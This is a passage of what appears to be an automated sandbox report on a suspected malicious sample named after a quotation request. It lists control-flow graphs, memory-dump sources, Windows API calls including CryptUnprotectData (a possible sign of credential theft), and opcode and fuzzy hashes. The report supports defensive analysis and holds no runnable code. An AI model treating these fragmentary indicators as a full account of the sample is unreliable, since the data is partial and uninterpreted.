                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 2135 36df98d0-36df98f0 2136 36df98f7-36df9957 2135->2136 2137 36df98f2 2135->2137 2139 36df995d-36df9a6e 2136->2139 2140 36df9c8a-36df9cb2 2136->2140 2137->2136 2182 36df9a98 2139->2182 2183 36df9a70-36df9a7c 2139->2183 2143 36dfa439-36dfa461 2140->2143 2144 36df9cb8-36df9cdf 2140->2144 2150 36dfa467-36dfa61f 2143->2150 2151 36dfa6f0 2143->2151 2148 36df9fde-36dfa34a 2144->2148 2149 36df9ce5-36df9eea 2144->2149 2295 36dfa34c-36dfa361 2148->2295 2296 36dfa363-36dfa374 2148->2296 2251 36df9eec-36df9f01 2149->2251 2252 36df9f03-36df9f14 2149->2252 2244 36dfa629-36dfa648 call 113168 2150->2244 2153 36dfa6f1-36dfa6f7 2151->2153 2186 36df9a9e-36df9c40 2182->2186 2188 36df9a7e-36df9a84 2183->2188 2189 36df9a86-36df9a8c 2183->2189 2266 36df9c4f 2186->2266 2267 36df9c42-36df9c4e 2186->2267 2190 36df9a96 2188->2190 2189->2190 2190->2186 2255 36dfa64d-36dfa697 2244->2255 2260 36df9f15-36df9fd9 2251->2260 2252->2260 2272 36dfa6a2-36dfa6bd call 36dfa709 2255->2272 2288 36dfa438 2260->2288 2266->2140 2267->2266 2275 36dfa6c3-36dfa6c5 2272->2275 2275->2153 2288->2143 2299 36dfa375-36dfa437 2295->2299 2296->2299 2299->2288
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Teq$p@q
                                                                                                                                • API String ID: 0-2716814348
                                                                                                                                • Opcode ID: 32438de4642036519058dddd08f60652613c4cadb2e6f8058491db0c30ecd889
                                                                                                                                • Instruction ID: 5f68e182e470dfe80699746b1fa69e8527a05be8d252c38b91cd4e43efa39c5a
                                                                                                                                • Opcode Fuzzy Hash: 32438de4642036519058dddd08f60652613c4cadb2e6f8058491db0c30ecd889
                                                                                                                                • Instruction Fuzzy Hash: 9972D474A00218CFDB24DF64D954B99BBB2FF89301F5081E9D80AA7364CB35AE82DF50
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558107577.0000000036DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DD0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36dd0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: bc933529f79f095d85aee42740afd93f9a8f0a90da5a3a5fb87d0b2e6841729a
                                                                                                                                • Instruction ID: 8303b1d130f36cb4924fd099a6b82ced13347dea5ccfd23916531292970d0c2b
                                                                                                                                • Opcode Fuzzy Hash: bc933529f79f095d85aee42740afd93f9a8f0a90da5a3a5fb87d0b2e6841729a
                                                                                                                                • Instruction Fuzzy Hash: 8A919475E007188BEF18EFB9C89079DBBF2AF84310F10956AD419A7391DB359D06CBA1
                                                                                                                                APIs
                                                                                                                                • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 36DDBD25
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558107577.0000000036DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DD0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36dd0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CryptDataUnprotect
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 834300711-0
                                                                                                                                • Opcode ID: 5dff6a32f2268e3d58dd9d1aa38fb84a9ec3d00c07103f70d330672837762248
                                                                                                                                • Instruction ID: 4dcfdffd4df660beab55fa408db5371e845980d956e47ef18a6b800002cdeb09
                                                                                                                                • Opcode Fuzzy Hash: 5dff6a32f2268e3d58dd9d1aa38fb84a9ec3d00c07103f70d330672837762248
                                                                                                                                • Instruction Fuzzy Hash: 211144B68003499FDB20DF99C841BEEBBF5EF48320F148419EA14A7210C739A950CFA5
                                                                                                                                APIs
                                                                                                                                • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 36DDBD25
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558107577.0000000036DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DD0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36dd0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CryptDataUnprotect
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 834300711-0
                                                                                                                                • Opcode ID: f07a956f7f3b97ebaebb9121e11a6c33e61c15123e26434c41c1b651d201e644
                                                                                                                                • Instruction ID: f871e8471269a2b57436f3ad275e6ec70010e4628645c03741fdfba69f136e61
                                                                                                                                • Opcode Fuzzy Hash: f07a956f7f3b97ebaebb9121e11a6c33e61c15123e26434c41c1b651d201e644
                                                                                                                                • Instruction Fuzzy Hash: CD1134B68002499FDB20DF99C841BDEBFF5EF48320F148419EA18A7210C739A950DFA1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 247dd979cd3d6784c7446e5f04d9b6de00d3756637aa372a53bb5c3a09bc05f3
                                                                                                                                • Instruction ID: 8a95a5ddbc1dacea96659236beb053ce9c12b9957138ccf8d9f5f9f9cad9c285
                                                                                                                                • Opcode Fuzzy Hash: 247dd979cd3d6784c7446e5f04d9b6de00d3756637aa372a53bb5c3a09bc05f3
                                                                                                                                • Instruction Fuzzy Hash: A472CFB4E112688FEB64DF69C980BDDBBB2BB49300F1581E9D448AB355DB359E81CF40
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558107577.0000000036DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DD0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36dd0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6c18a2df091fc54af2736180d217002410269395ecd66ec70f00ac1fdbc7ca6e
                                                                                                                                • Instruction ID: ce139fef13e7e465fdc2d7d93c2aea775e3b2a9b7293c5e6e22e1969350b3725
                                                                                                                                • Opcode Fuzzy Hash: 6c18a2df091fc54af2736180d217002410269395ecd66ec70f00ac1fdbc7ca6e
                                                                                                                                • Instruction Fuzzy Hash: C0E1B1B4E01218CFEB24DFA9C844B9DBBB2BF89304F2081A9D409B7395DB755A85DF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2532564282.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_110000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ad242cb27ee0c6c50802411e7bbf711c4d9ffb9d5dbeda1f811e8a27d162e3e5
                                                                                                                                • Instruction ID: e3b359abd7dbb13caca179c0722c4e5c332607fb2e934a5ea8244d575252383c
                                                                                                                                • Opcode Fuzzy Hash: ad242cb27ee0c6c50802411e7bbf711c4d9ffb9d5dbeda1f811e8a27d162e3e5
                                                                                                                                • Instruction Fuzzy Hash: D6C17E74E00218CFDB28DFA5D954B9DBBB2BF88301F2081A9D809A7355DB359E86DF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2532564282.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_110000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 2c7856943bf5c18445087f9cff04e1ae0a83dbed5b805c6c2931e1b35e30ee7f
                                                                                                                                • Instruction ID: 66a4dd8c7b926dc1c03bb55cdcdd3cd8f158d49b73c124dbfdbe2c491ce2684a
                                                                                                                                • Opcode Fuzzy Hash: 2c7856943bf5c18445087f9cff04e1ae0a83dbed5b805c6c2931e1b35e30ee7f
                                                                                                                                • Instruction Fuzzy Hash: 52A10374D00208CFEB14DFA8D948BDDBBB1FF89314F208269E409AB2A1DB759985CF55
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a4cf50a9e5252e19b9a69bf18a3ea3a279a87cd424c4982bc9532ad025af8c40
                                                                                                                                • Instruction ID: 10e8b5fd8f420c78f1f708644b9ed4bf63e120a3eb3d0143206e2d4b686138d7
                                                                                                                                • Opcode Fuzzy Hash: a4cf50a9e5252e19b9a69bf18a3ea3a279a87cd424c4982bc9532ad025af8c40
                                                                                                                                • Instruction Fuzzy Hash: AEA1A1B4E112288FEB14CF6AD944B9DFBF2BF89300F14C1AAD408AB251DB755A85CF51
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 156b9886a84effc017c8c1d6da80c3c057bfe7bfdfec3b04514705477b4de6fa
                                                                                                                                • Instruction ID: 6198a6540f99fd3a7c223d89b9354b5652d6cc0d1a2b8111a9fc819f2984c1e8
                                                                                                                                • Opcode Fuzzy Hash: 156b9886a84effc017c8c1d6da80c3c057bfe7bfdfec3b04514705477b4de6fa
                                                                                                                                • Instruction Fuzzy Hash: F8A19FB4E012288FEB14CF6AD944BDDBBF2AF89300F15C1AAD40CAB254DB755A85CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 46754e034033baa0c6c34a32419b323adb855e17550e24b06fdfa602bdb811be
                                                                                                                                • Instruction ID: 98437ff939290fe76092c6bf79cca3b070be012d0b51fc39682ae33e725453c9
                                                                                                                                • Opcode Fuzzy Hash: 46754e034033baa0c6c34a32419b323adb855e17550e24b06fdfa602bdb811be
                                                                                                                                • Instruction Fuzzy Hash: 3EA180B4E112288FEB24CF6AC944B9DBBF2BF89300F14C1AAD408A7255DB355A85CF51
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 18518d48eb3822b339dad7d7bb284fbbcb59d3891d8b21850ae284eaa60f1f9e
                                                                                                                                • Instruction ID: 7eeaecde59b86d6f3f0776ca21bca39f5b42a1d83e664a32efa659330ce85dd6
                                                                                                                                • Opcode Fuzzy Hash: 18518d48eb3822b339dad7d7bb284fbbcb59d3891d8b21850ae284eaa60f1f9e
                                                                                                                                • Instruction Fuzzy Hash: DDA192B4E012288FEB58CF6AD944BDDBBF2BF89300F14C1AAD408A7255DB355A85CF51
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2532564282.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_110000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f9b637bd8b6732f250313ec637a11abcc214200e32f7949f3997e1aceaac4cca
                                                                                                                                • Instruction ID: 7b069e68c081741f4651f15745b75864f509f2d06aba58a1dc278973551ed912
                                                                                                                                • Opcode Fuzzy Hash: f9b637bd8b6732f250313ec637a11abcc214200e32f7949f3997e1aceaac4cca
                                                                                                                                • Instruction Fuzzy Hash: BB91E074D00608CFEB14DFA8D988BDCBBB1FF49314F208269E409AB291DB759985CF55
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 632816d4dc5ec4a7b8ba075bc5fd4dbb3d5156d3d34cf974b13ff2b94ca9ab9d
                                                                                                                                • Instruction ID: 6957318a4c13dc03c56bd87064c37c5adcd72eb3371f9e8d1e3ee7a4a66a3e4d
                                                                                                                                • Opcode Fuzzy Hash: 632816d4dc5ec4a7b8ba075bc5fd4dbb3d5156d3d34cf974b13ff2b94ca9ab9d
                                                                                                                                • Instruction Fuzzy Hash: BF81D474E102088FEB14DFAAD94069DBBF2BF88314F248129D455BB394DB369942CF94
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 60ca41bff8fc23561419d2405d3b06732d08a426dd0cae2517ca3287099a313a
                                                                                                                                • Instruction ID: b8e5a8e3efb71667e080f9e1bcee1c5f7fcb025549f4d6e9ea573c7f4254cf12
                                                                                                                                • Opcode Fuzzy Hash: 60ca41bff8fc23561419d2405d3b06732d08a426dd0cae2517ca3287099a313a
                                                                                                                                • Instruction Fuzzy Hash: D071A4B5D01228CFDB64CF66C9807DDBBF2BB89300F1491AAD409AB354DB359A86CF40
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1bc4cc3e840ea2d084c0a159305eab38ce966aa76a08571b7c0bdceff3f82a98
                                                                                                                                • Instruction ID: 189c4d7fdf6a16fed6e5411cc7ad8b73ba64826cf7c5aebd4469b793af725378
                                                                                                                                • Opcode Fuzzy Hash: 1bc4cc3e840ea2d084c0a159305eab38ce966aa76a08571b7c0bdceff3f82a98
                                                                                                                                • Instruction Fuzzy Hash: D57185B5E006288FEB58CF6AC944B9DFBF2AF89300F14C1AAD40DA7255DB344A85CF51
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d7598e940ece75d8068eccd495b491bf57431a9262223f9af42d57e9bbbe82ef
                                                                                                                                • Instruction ID: 673388e67ef1d8e745862420bb6f931f86a05ce0235fdac4f407bafce41a58e1
                                                                                                                                • Opcode Fuzzy Hash: d7598e940ece75d8068eccd495b491bf57431a9262223f9af42d57e9bbbe82ef
                                                                                                                                • Instruction Fuzzy Hash: 16415BB1D016188BEB58CF6BD9557C9FAF3AFC9300F04C1BAC50CA6254DB744A868F51
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8ce9dac4c50f60ffeff36b9ba366ead181890a550852eeabf0adf1593a36f98b
                                                                                                                                • Instruction ID: cd9172d3ce6429b1050f005206c29a6b06ecb17c16ceabe3872cf4278ecc0b98
                                                                                                                                • Opcode Fuzzy Hash: 8ce9dac4c50f60ffeff36b9ba366ead181890a550852eeabf0adf1593a36f98b
                                                                                                                                • Instruction Fuzzy Hash: 194148B1D016188BEB58CF6BD9457CAFAF3AFC9300F14C1AAC50CA6264DB740A868F51

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 273 37e505f9-37e50697 GetCurrentProcess 277 37e506a0-37e506d4 GetCurrentThread 273->277 278 37e50699-37e5069f 273->278 279 37e506d6-37e506dc 277->279 280 37e506dd-37e50711 GetCurrentProcess 277->280 278->277 279->280 282 37e50713-37e50719 280->282 283 37e5071a-37e50735 call 37e507d7 280->283 282->283 286 37e5073b-37e5076a GetCurrentThreadId 283->286 287 37e50773-37e507d5 286->287 288 37e5076c-37e50772 286->288 288->287
                                                                                                                                APIs
                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 37E50686
                                                                                                                                • GetCurrentThread.KERNEL32 ref: 37E506C3
                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 37E50700
                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 37E50759
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558925034.0000000037E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37E50000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_37e50000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Current$ProcessThread
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2063062207-0
                                                                                                                                • Opcode ID: 7582a3beddf10ffc366c14a0fd6ade0c2545378003b2342d668ca0da45fb861a
                                                                                                                                • Instruction ID: f7b97d8d6b38ce33bd2308212c95ef645c10293718d4b583be73dff54eac5900
                                                                                                                                • Opcode Fuzzy Hash: 7582a3beddf10ffc366c14a0fd6ade0c2545378003b2342d668ca0da45fb861a
                                                                                                                                • Instruction Fuzzy Hash: 315166B0D007098FDB14DFAAD545BEEBBF1EB88320F208419E019A73A0DB74A941CF65

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 622 37e50608-37e50697 GetCurrentProcess 626 37e506a0-37e506d4 GetCurrentThread 622->626 627 37e50699-37e5069f 622->627 628 37e506d6-37e506dc 626->628 629 37e506dd-37e50711 GetCurrentProcess 626->629 627->626 628->629 631 37e50713-37e50719 629->631 632 37e5071a-37e50735 call 37e507d7 629->632 631->632 635 37e5073b-37e5076a GetCurrentThreadId 632->635 636 37e50773-37e507d5 635->636 637 37e5076c-37e50772 635->637 637->636
                                                                                                                                APIs
                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 37E50686
                                                                                                                                • GetCurrentThread.KERNEL32 ref: 37E506C3
                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 37E50700
                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 37E50759
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558925034.0000000037E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37E50000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_37e50000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Current$ProcessThread
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2063062207-0
                                                                                                                                • Opcode ID: 15d078dfa82fc34ea225c0e01f3e563605f5236abc59722d8b1abd013581ddb1
                                                                                                                                • Instruction ID: 6147ea6b488a28ab6d0834d0b9bf35d8744527de59a652d101f529156358fd78
                                                                                                                                • Opcode Fuzzy Hash: 15d078dfa82fc34ea225c0e01f3e563605f5236abc59722d8b1abd013581ddb1
                                                                                                                                • Instruction Fuzzy Hash: 565155B0D017098FDB14DFAAD545BEEBBF1EB88321F208419E019A7360DB74A945CF65

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1423 36dfb028-36dfb14d 1442 36dfb153-36dfb199 1423->1442 1443 36dfb1f0-36dfb221 1423->1443 1448 36dfb19b-36dfb19f 1442->1448 1449 36dfb1a4-36dfb1ef 1442->1449 1450 36dfb227-36dfb23e 1443->1450 1448->1449
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4'q$4'q$3YR<^
                                                                                                                                • API String ID: 0-683271351
                                                                                                                                • Opcode ID: 341a71f740d3b841f3ed86dc40c02731754512a9ff6235b46a37eb8d967dcf81
                                                                                                                                • Instruction ID: 0a52bcd8ec9baea130c2d4d6f002e6aa51a6d35b640cf6a78330a29330003b75
                                                                                                                                • Opcode Fuzzy Hash: 341a71f740d3b841f3ed86dc40c02731754512a9ff6235b46a37eb8d967dcf81
                                                                                                                                • Instruction Fuzzy Hash: 0B517270E102099FCB05EFA4E955AEEBBB2FF89300F104169E005BB256DB35AE45CF91
                                                                                                                                APIs
                                                                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0011FEAA
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2532564282.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_110000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 716092398-0
                                                                                                                                • Opcode ID: 25edcae13f0dbb12f3b20f1edfb5b70ea96ded52734e6d80573542d6aa6e7067
                                                                                                                                • Instruction ID: bc22830e024c8e17d6deebc05f55c6c8f1771cf680593c08678f4c508388409f
                                                                                                                                • Opcode Fuzzy Hash: 25edcae13f0dbb12f3b20f1edfb5b70ea96ded52734e6d80573542d6aa6e7067
                                                                                                                                • Instruction Fuzzy Hash: 5C51C0B1D003099FDB14CF9AC880ADEFBB1BF48310F65812AE819AB211D7759986CF90
                                                                                                                                APIs
                                                                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0011FEAA
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2532564282.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_110000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 716092398-0
                                                                                                                                • Opcode ID: 6407684c3da4415aeac9df6dc649585aa2119b9798054e350942c74cda4e641e
                                                                                                                                • Instruction ID: c2e614d7b155ec652e2a890ee7641e88e4aaa4e0d8a8a15e6cfc64470e4ddac4
                                                                                                                                • Opcode Fuzzy Hash: 6407684c3da4415aeac9df6dc649585aa2119b9798054e350942c74cda4e641e
                                                                                                                                • Instruction Fuzzy Hash: 3641B0B1D00309DFDB14CF9AD884ADEBBB5BF48310F25822EE819AB251D7759985CF90
                                                                                                                                APIs
                                                                                                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 37E51B21
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558925034.0000000037E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37E50000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_37e50000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CallProcWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2714655100-0
                                                                                                                                • Opcode ID: d8f90bf193cd838796cfeab0a912edc5e48636d732e54c51bb63525ea7fc344b
                                                                                                                                • Instruction ID: 7d2da09a50495cddaf834494b231e753c0c3c522975a574ad73aac6337e3d21e
                                                                                                                                • Opcode Fuzzy Hash: d8f90bf193cd838796cfeab0a912edc5e48636d732e54c51bb63525ea7fc344b
                                                                                                                                • Instruction Fuzzy Hash: DD4119B8900309DFDB14CF95C885BAABBF5FF88324F25C459D519AB321D775A841CBA0
                                                                                                                                APIs
                                                                                                                                • OleInitialize.OLE32(00000000), ref: 37E5D2B5
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558925034.0000000037E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37E50000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_37e50000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Initialize
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2538663250-0
                                                                                                                                • Opcode ID: 358025617d2c66fd065257e4bfb9a277210bbc570b7cbad7266cc4427410a705
                                                                                                                                • Instruction ID: 792dbc92a4549b645e2eb773185be08d5baa928b6a5e9b92aa166fd3a2be039d
                                                                                                                                • Opcode Fuzzy Hash: 358025617d2c66fd065257e4bfb9a277210bbc570b7cbad7266cc4427410a705
                                                                                                                                • Instruction Fuzzy Hash: 4121C7B1C093998FDB12DFA9C4557CABFF0EF06220F15409EC094EB252D7789949CBA6
                                                                                                                                APIs
                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 37E508D7
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558925034.0000000037E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37E50000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_37e50000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                • Opcode ID: 7b53139e7b944c4f23e065120b6c7b3991b66d4c0476f1428a05e883832ee6b1
                                                                                                                                • Instruction ID: 08682508ef9e6e580b5dd5ab1905a5c57d65d390d9fe5770ce634bfb05461144
